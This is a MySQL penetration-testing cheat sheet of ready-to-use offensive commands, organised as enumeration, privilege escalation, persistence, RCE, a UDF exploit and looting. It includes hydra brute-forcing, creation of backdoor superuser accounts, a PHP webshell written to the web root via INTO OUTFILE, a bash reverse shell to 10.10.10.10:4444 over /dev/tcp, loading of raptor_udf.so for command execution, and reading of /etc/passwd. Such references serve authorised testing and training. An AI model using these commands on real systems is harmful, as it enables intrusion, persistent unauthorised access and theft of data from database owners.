🐬 MySQL Pentesting

🔍 Enum

# Nmap scripts
nmap -p 3306 --script mysql-* <target>

# Hydra brute-force
hydra -l root -P rockyou.txt mysql://<target>

SELECT VERSION();               -- Version
SELECT USER();                  -- Current user
SELECT DATABASE();              -- Current database
SHOW DATABASES;                 -- List databases
SHOW TABLES;                    -- List tables
SELECT user FROM mysql.user;    -- List mysql users

@@version_compile_os            -- Lin/Win/Mac
@@version_compile_machine       -- x86/x86_64/ARM
@@plugin_dir                    -- Path to plugin dir

💻 Command

mysql command can be replaced with mariadb.

# -p (force password)
mysql -u username -p

# Execute commands
mysql -u username -p'' database_name -e "show databases;"

# Execute commands via a file
echo 'show tables;' > example.sql
mysql -u username --password='password' database_name -v < example.sql

# Read arbitrary files
mysql -u username --password='password' database_name -v < /etc/passwd

# Remote DB (-h <host>)
mysql -u username -p -h <host> -P 3306

# Specify database (-D)
mysql -u username -p -h <target-ip> -D database_name

🚀 PrivEsc

-- Check privileges
SHOW GRANTS FOR CURRENT_USER;

-- Try to enable FILE writes
GRANT FILE ON *.* TO 'username'@'%';

-- Create admin user
CREATE USER 'hacker'@'%' IDENTIFIED BY 'pwned';
GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' WITH GRANT OPTION;

🔒 Persistence

-- Create user with super privileges
CREATE USER management@'%' IDENTIFIED BY 'toor';
GRANT SUPER, PROCESS, FILE ON *.* TO management@'%';

-- Add to mysql.user manually (dangerous, requires FILE privilege)
INSERT INTO mysql.user (Host, User, authentication_string, ssl_cipher, x509_issuer, x509_subject)
VALUES ('%', 'ghost', PASSWORD('rooted'), '', '', '');

💥 RCE

-- Webshell via OUTFILE
SHOW VARIABLES LIKE 'secure_file_priv'; -- Show right

UNION ALL SELECT 1,2,3,4,"<?php system($_GET['c']);?>",6 into OUTFILE '/var/www/html/shell.php';
SELECT "<?php system($_GET['c']);?>" INTO OUTFILE '/var/www/html/shell.php';

-- Command Injection trick
UPDATE users SET email='x'||system('bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"') WHERE id=1;

🐬 MySQL UDF exploit

• MySQL-UDF-Exploitation (Linux / Windows) (with .dll & .so compiled for sys 32/64)

-- For Linux
USE mysql;
SHOW variables like '%plugin%';
create table foo(line blob);
insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from foo into dumpfile '<Plugin-Directory>/raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
select * from mysql.func;

SELECT do_system('id');

Can be used to PrivEsc : exploit-db (MySQL UDF PE)

📂 Looting

-- Read local files
SELECT LOAD_FILE('/etc/passwd');

-- Dump data from a table
SELECT * FROM sensitive_table INTO OUTFILE '/tmp/dump.txt';